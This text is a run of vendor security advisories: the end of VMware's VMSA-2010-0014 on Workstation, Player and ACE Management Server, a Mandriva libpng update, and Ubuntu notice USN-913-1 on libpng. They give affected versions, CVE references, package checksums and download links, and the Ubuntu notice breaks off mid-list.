not affected\n\n Player 3.x any 3.1.2 build 301548 or later *\n Player 2.5.x any not affected\n\n AMS any any not affected\n\n Server any any not affected\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n * Note: This only affects the installer, if you have a version of\n Workstation or Player installed you are not vulnerable. \n\n\n b. Third party libpng updated to version 1.2.44\n\n A buffer overflow condition in libpng is addressed that could\n potentially lead to code execution with the privileges of the\n application using libpng. Two potential denial of service issues\n are also addressed in the update. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249\n to these issues. \n\n The following table lists what action remediates the vulnerability\n (column 4) if a solution is available. \n\n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation 7.1.x any 7.1.2 build 301548 or later\n Workstation 6.5.x any affected, patch pending\n\n Player 3.1.x any 3.1.2 build 301548 or later\n Player 2.5.x any affected, patch pending\n\n AMS any any not affected\n\n Server any any affected, no patch planned\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n\n c. VMware ACE Management Server (AMS) for Windows updates Apache httpd\n version 2.2.15. \n\n A function in Apache HTTP Server when multithreaded MPM is used\n does not properly handle headers in subrequests in certain\n circumstances which may allow remote attackers to obtain sensitive\n information via a crafted request that triggers access to memory\n locations associated with an earlier request. \n\n The Apache mod_isapi module can be forced to unload a specific\n library before the processing of a request is complete, resulting\n in memory corruption. This vulnerability may allow a remote\n attacker to execute arbitrary code. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-0434 and CVE-2010-0425 to the\n issues addressed in this update. \n\n Column 4 of the following table lists the action required to\n remediate the vulnerability in each release, if a solution is\n available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation any any not affected\n\n Player any any not affected\n\n AMS any Windows 2.7.2 build 301548 or later\n AMS any Linux affected, patch pending *\n\n Server any any not affected\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n * Note CVE-2010-0425 is not applicable to AMS running on Linux\n\n4. Solution\n Please review the patch/release notes for your product and version\n and verify the md5sum and/or the sha1sum of your downloaded file. \n\n VMware Workstation 7.1.2\n ------------------------\n http://www.vmware.com/download/ws/\n Release notes:\n http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html\n\n Workstation for Windows 32-bit and 64-bit with VMware Tools\t\n md5sum: 2e9715ec297dc3ca904ad2707d3e2614\n sha1sum: 55b2b99f67c3dacd402fb9880999086efd264e7a\n\n Workstation for Windows 32-bit and 64-bit without VMware Tools\t\n md5sum: 066929f59aef46f11f4d9fd6c6b36e4d\n sha1sum: def776a28ee1a21b1ad26e836ae868551fff6fc3\n\n VMware Player 3.1.2\n -------------------\n http://www.vmware.com/download/player/\n Release notes:\n\nhttp://downloads.vmware.com/support/player31/doc/releasenotes_player312.html\n\n VMware Player for Windows 32-bit and 64-bit\t\n md5sum: 3f289cb33af5e425c92d8512fb22a7ba\n sha1sum: bf67240c1f410ebeb8dcb4f6d7371334bf9a6b70\n\n VMware Player for Linux 32-bit\t\n md5sum: 11e3e3e8753e1d9abbbb92c4e3c1dfe8\n sha1sum: dd1dbcdb1f4654eefc11472b68934dcb69842749\n\n VMware Player for Linux 64-bit\t\n md5sum: 2ab08e0d4050719845a64d334ca15bb1\n sha1sum: f024ad84ec831fce8667dfa9601851da5d9fa59c\n\n VMware ACE Management Server 2.7.2\n ----------------------------------\n http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7\n Release notes:\n http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html\n\n ACE Management Server for Windows\t\n md5sum: 02f0072b8e48a98ed914b633f070d550\n sha1sum: 94a68eac4a328d21a741879b9d063227c0dc1ce4\n\n5. References\n\n CVE numbers\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3277\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0434\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n2010-09-23 VMSA-2010-0014\nInitial security advisory after release of Workstation 7.1.2,\nPlayer 3.1.2 and ACE Management Server 2.7.2 on 2010-09-23\n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n * security-announce at lists.vmware.com\n * bugtraq at securityfocus.com\n * full-disclosure at lists.grok.org.uk\n\nE-mail: security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisoiries\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAkycSrQACgkQS2KysvBH1xmT9wCfbBUS4GYrJohz+QMLYcoiFmSh\neTgAoIAmx+ilbe2myj02daLjFrVQfQII\n=5jlh\n-----END PGP SIGNATURE-----\n. \n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers. \n \n The updated packages have been patched to correct these issues. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2042\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2008.0:\n a490385a7af091254460923d5b370281 2008.0/i586/libpng3-1.2.22-0.4mdv2008.0.i586.rpm\n 0a24bbf70a2d0acfe67872e0c9d8f709 2008.0/i586/libpng-devel-1.2.22-0.4mdv2008.0.i586.rpm\n 4606a9e929c6051e122b70ebe2e7bad4 2008.0/i586/libpng-source-1.2.22-0.4mdv2008.0.i586.rpm\n 694d03d2e8d3bcd07fc0684fd8a6b0c9 2008.0/i586/libpng-static-devel-1.2.22-0.4mdv2008.0.i586.rpm \n da310f9645a322af4d2a97b9cf4592eb 2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 4502fd5d882a47d409bfd0e0bc154c88 2008.0/x86_64/lib64png3-1.2.22-0.4mdv2008.0.x86_64.rpm\n 91b539a7a3a87d57c1ee1e33921aa787 2008.0/x86_64/lib64png-devel-1.2.22-0.4mdv2008.0.x86_64.rpm\n f0e202692b44e5ebd09168e307a1ad7b 2008.0/x86_64/lib64png-static-devel-1.2.22-0.4mdv2008.0.x86_64.rpm\n a5c685aa7aac15155af58211a576e08c 2008.0/x86_64/libpng-source-1.2.22-0.4mdv2008.0.x86_64.rpm \n da310f9645a322af4d2a97b9cf4592eb 2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm\n\n Corporate 4.0:\n e224d113e77e285d85ff11c55dae9e50 corporate/4.0/i586/libpng3-1.2.8-1.7.20060mlcs4.i586.rpm\n c0d62f11277442b0d7a909d0c1c53249 corporate/4.0/i586/libpng3-devel-1.2.8-1.7.20060mlcs4.i586.rpm\n 8ea7ca8ab7bbed8f2683698a3f493d56 corporate/4.0/i586/libpng3-static-devel-1.2.8-1.7.20060mlcs4.i586.rpm \n 76f958bdba2876ea2a36f42407aaa9dc corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n a19c0839e78e5d16cc159621ff8e3786 corporate/4.0/x86_64/lib64png3-1.2.8-1.7.20060mlcs4.x86_64.rpm\n 68d1b5c5174f6de15eb1d68735e45e0f corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm\n d477b9271f6beba77435121f09dff09d corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm \n 76f958bdba2876ea2a36f42407aaa9dc corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n 5fe2f05d45ebaac79c58e47429dedceb mnf/2.0/i586/libpng3-1.2.5-10.12.M20mdk.i586.rpm\n 0ebace3f9758ea06e6471317f95b253f mnf/2.0/i586/libpng3-devel-1.2.5-10.12.M20mdk.i586.rpm\n 3aa8ba999455eb190979ec7f6f22421a mnf/2.0/i586/libpng3-static-devel-1.2.5-10.12.M20mdk.i586.rpm \n 1ceca3083b90247ac1d1b68b4bf08f33 mnf/2.0/SRPMS/libpng-1.2.5-10.12.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFLp88BmqjQ0CJFipgRAl2vAKCNCYs8gf3lw0tqgRMM6WC87P6roQCfZMU2\nM2vZq2Q3ZYYDuZssm6LfxaI=\n=dFcH\n-----END PGP SIGNATURE-----\n. ===========================================================\nUbuntu Security Notice USN-913-1 March 16, 2010\nlibpng vulnerabilities\nCVE-2009-2042, CVE-2010-0205\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n libpng12-0 1.2.8rel-5ubuntu0.5\n\nUbuntu 8.04 LTS:\n libpng12-0 1.2.15~beta5-3ubuntu0.2\n\nUbuntu 8.10:\n libpng12-0 1.2.27-1ubuntu0.2\n\nUbuntu 9.04:\n libpng12-0 1.2.27-2ubuntu2.1\n\nUbuntu 9.10:\n libpng12-0 1.2.37-1ubuntu0.1\n\nAfter a standard system upgrade you need to reboot your computer to effect\nthe necessary changes. \n\nDetails follow:\n\nIt was discovered that libpng did not properly initialize memory when\ndecoding certain 1-bit interlaced images. If a user or automated system\nwere tricked into processing crafted PNG images, an attacker could possibly\nuse this flaw to read sensitive information stored in memory. This issue\nonly affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04. (CVE-2009-2042)\n\nIt was discovered that libpng did not properly handle certain excessively\ncompressed PNG images. If a user or automated system were tricked into\nprocessing a crafted PNG image, an attacker could possibly use this flaw to\nconsume all available resources, resulting in a denial of service. \n(CVE-2010-0205)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.5.diff.gz\n Size/MD5: 22337 fa254fcc4cb513e59eb9467abad87cca\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.5.dsc\n Size/MD5: 661 17f3956e31ccadfed0a3bfdc8f5f065a\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.5_all.deb\n Size/MD5: 842 a5ab55fb1b372c9ac93493fd699b276f\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_amd64.deb\n Size/MD5: 114374 1315864425b2dfaea123fe05118de0b0\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_amd64.deb\n Size/MD5: 247552 4acf10d5d173d06843cb1dc9b1b894fe\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_amd64.udeb\n Size/MD5: 69464 1761fb1c524387b8aabd7bd3dccb2eda\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_i386.deb\n Size/MD5: 111916 0043501424d2cee81d5f6229a2b3d166\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_i386.deb\n Size/MD5: 239610 8422b7b137f09b49d27541a87251cce4\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_i386.udeb\n Size/MD5: 66948 a8e6db358ed472eb9f18d3b51aed1347\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_powerpc.deb\n Size/MD5: 111422 a0ea39141ce6319b057db22e9fcaf8d6\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_powerpc.deb\n Size/MD5: 245142 d2d7ed0b8fa777fd58fe78345625a1e7\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_powerpc.udeb\n Size/MD5: 66386 f65de398bac540da7a25370999eb9643\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_sparc.deb\n Size/MD5: 108988 5bad496a668c87614866fe1f04c8c17e\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_sparc.deb\n Size/MD5: 239972 b3cf4fc712ab063ababdefc5030ad07a\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_sparc.udeb\n Size/MD5: 63832 148d28886ec7fdb3334196a762daad1c\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.2.diff.gz\n Size/MD5: 21048 9f9e2ce175afd0a41bfa613c8672a164\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.2.dsc\n Size/MD5: 832 59b9f6994e1bef9b8f83561b70afda00\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz\n Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-3ubuntu0.2_all.deb\n Size/MD5: 940 e6cfd9d151530dac9ef81148e1690e61\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_amd64.deb\n Size/MD5: 190022 6a7c0dfd7c8501f8628178b5b0eee0cd\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_amd64.deb\n Size/MD5: 179662 bc60e9256f650d385f0c1d175c14fe80\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_amd64.udeb\n Size/MD5: 70430 a6782df5314e3c49137b1d3253c2c6b4\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_i386.deb\n Size/MD5: 188650 0d4b87ea55d252a24bc74ebc4d748645\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_i386.deb\n Size/MD5: 171178 9608ecb2bd7697bbf4510822a6c61e32\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_i386.udeb\n Size/MD5: 69094 f39b5e822f4da67599876c68904ecad1\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_lpia.deb\n Size/MD5: 189520 36f70d5b5d6cc10e89323efd72b3e061\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_lpia.deb\n Size/MD5: 172882 1b5a5a4d6198c0eb6b14dc89c5a9da19\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_lpia.udeb\n Size/MD5: 69994 a3e824e57de27f7b7ed1b93ddd6f6917\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_powerpc.deb\n Size/MD5: 190076 8ec2399126dc45cb9069588dec4f23ef\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_powerpc.deb\n Size/MD5: 179070 3a16935d6ed3029b636f5a2277470659\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_powerpc.udeb\n Size/MD5: 70556 a2f68773735f91ca14c95fe374a56d7b\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_sparc.deb\n Size/MD5: 185426 8755e9f8c1be78dbe2de213d9666fd7f\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_sparc.deb\n Size/MD5: 173332 f94ff6354e27bda2f21a8a542e77f274\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_sparc.udeb\n Size/MD5: 65854 2631780a00ee2727264e6d0f477daa83\n\nUpdated packages for Ubuntu 8.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-1ubuntu0.2.diff.gz\n Size/MD5: 19116 22de419d4a9203e183ccc14813b0d5e2\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-1ubuntu0.2.dsc\n Size/MD5: 1293 bd0ff3a04141fae88c8136f6f9ee63d4\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz\n Size/MD5: 783204 13a0de401db1972a8e68f47d5bdadd13\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-1ubuntu0.2_all.deb\n Size/MD5: 934 cdd02e7c09b4bb61bd14670f155f81f4\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_amd64.deb\n Size/MD5: 168308 37a5c4970ffd3dc878026e66310bfecc\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_amd64.deb\n Size/MD5: 255526 df3e911f99e2d64d3246710e0dea9d49\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_amd64.udeb\n Size/MD5: 72758 6a64efb6a07e32ddfe80bed566e110c8\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_i386.deb\n Size/MD5: 166630 08a7389cb42e41ebba773ecdb9e347fe\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_i386.deb\n Size/MD5: 247664 e39fbb64952529e977b335e308662782\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_i386.udeb\n Size/MD5: 71014 9e5c717ed5d4e17d86caabb80221030d\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_lpia.deb\n Size/MD5: 167096 ed195852cc2b60cb0ddc9cccf87ed280\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_lpia.deb\n Size/MD5: 248616 dc85b020b9a129916f24618d3e27e684\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_lpia.udeb\n Size/MD5: 71418 e60289ac791f78aae8eb5598a3eacb5a\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_powerpc.deb\n Size/MD5: 167230 5f8b71b3a98b1645727f1f4ae534f960\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_powerpc.deb\n Size/MD5: 254380 76ea57650fd01eb86a315ca0b73dcdca\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_powerpc.udeb\n Size/MD5: 71582 f9b8803343f2f61bf5f07b1fb4a25918\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_sparc.deb\n Size/MD5: 162222 445a3d3abb843e73fbf89fe0520ab664\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_sparc.deb\n Size/MD5: 248216 768f20b123d1b0c1c448b3b240245d5c\n http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_sparc.udeb\n Size/MD5: 66728 cf376eab6461fdee69f0bbde6d58dc53\n\nUpdated packages for Ubuntu 9.04:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.1.diff.gz\n Size/MD5: 174503 ffa63cd1b57dc442faff9a65d2f25ee7\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.1.dsc\n Size/MD5: 1296 890ff19ff7b12aa90d0d38c0b1550055\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz\n Size/MD5: 783204 13a0de401db1972a8e68f47d5bdadd13\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-2ubuntu2.1_all.deb\n Size/MD5: 936 3dee09961304f1caf76db0995a027b95\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_amd64.udeb\n Size/MD5: 72778 30622682dc700cba1101384ab84fe7ca\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_amd64.deb\n Size/MD5: 168382 4be6ce864bf04169baf7d4b656ea8e02\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_amd64.deb\n Size/MD5: 255620 730ed6a69006fa14753ef99f89664d31\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_i386.udeb\n Size/MD5: 71084 5a3cc8f7589fae49e91689d85476b193\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_i386.deb\n Size/MD5: 166732 d674a5262197c091d9ca5b2370cff187\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_i386.deb\n Size/MD5: 247744 644a3757529a46d3389e2db18a566f3d\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_lpia.udeb\n Size/MD5: 71472 662aba7284b732240c2d7bff864eed12\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_lpia.deb\n Size/MD5: 167200 47dc03f91b37b73626e026cb7da28b15\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_lpia.deb\n Size/MD5: 248706 a01e8fe54d38f4101c6ad0f78eec4a7e\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_powerpc.udeb\n Size/MD5: 71564 96e3fb7342ab462db7a27fbd39a46649\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_powerpc.deb\n Size/MD5: 167254 90e1cb3da8cc85953442611cf0faaed8\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_powerpc.deb\n Size/MD5: 254444 4b89c89e031c0d4265b1eb3da45f06e9\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_sparc.udeb\n Size/MD5: 66646 ac9aa1a738ef8ed71bd8b876f1920098\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_sparc.deb\n Size/MD5: 162176 06a1b4ab47a39790da4e9b1e0967c1d2\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_sparc.deb\n Size/MD5: 248222 91cca4c40c4ce6ac41df52ea62e5008a\n\nUpdated packages for Ubuntu 9.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.1.diff.gz\n Size/MD5: 18107 a9bf93cac21b17a3589193ae511b75d2\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.1.dsc\n Size/MD5: 1293 dc9a20f9a129ad150f61ec9bb745b039\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37.orig.tar.gz\n Size/MD5: 805380 7480dbbf9f6c3297faf6fe52ec9b91ab\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.37-1ubuntu0.1_all.deb\n Size/MD5: 934 3d21bd9bf41fe210303474389cfeb0a8\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_amd64.udeb\n Size/MD5: 73848 d436fc20150573d565017d9e29141484\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_amd64.deb\n Size/MD5: 174886 34607a76ee1ebdd82b5c71068e6e32b2\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_amd64.deb\n Size/MD5: 265214 f600588bdf4f00731d94ccd8bbc68455\n\n i386 architecture (x86 compatible Intel/AMD):\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_i386.udeb\n Size/MD5: 70382 7d93414ce0e28351b972605abae92cd1\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_i386.deb\n Size/MD5: 171402 2b8f6f1c8e8300c3149c59d1fc107659\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_i386.deb\n Size/MD5: 255250 a033009f8d9a990655437c3d129668bf\n\n lpia architecture (Low Power Intel Architecture):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_lpia.udeb\n Size/MD5: 71012 d3df3a73bf61acb9f1d489a32b3b8a60\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_lpia.deb\n Size/MD5: 172126 1b94fcc470ba8878eace85240fae74cf\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_lpia.deb\n Size/MD5: 257172 3c3280435a2b7d1817b49cd4a3a14bef\n\n powerpc architecture (Apple Macintosh G3/G4/G5):\n\n 